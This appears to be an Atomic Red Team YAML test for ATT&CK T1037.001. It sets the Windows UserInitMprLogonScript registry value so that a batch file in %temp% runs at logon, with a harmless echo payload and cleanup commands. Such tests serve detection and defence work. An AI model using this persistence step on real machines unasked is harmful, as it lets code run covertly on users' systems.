attack_technique: T1037.001
display_name: "Boot or Logon Initialization Scripts: Logon Script (Windows)"
atomic_tests:
- name: Logon Scripts
  auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231
  description: |
    Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
    that can be viewed in the Registry Editor.
  supported_platforms:
  - windows
  input_arguments:
    script_path:
      description: Path to .bat file
      type: string
      default: '%temp%\art.bat'
    script_command:
      description: Command To Execute
      type: string
      default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt
  executor:
    command: |
      echo "#{script_command}" > #{script_path}
      REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
    cleanup_command: |
      REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
      del #{script_path} >nul 2>&1
      del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
    name: command_prompt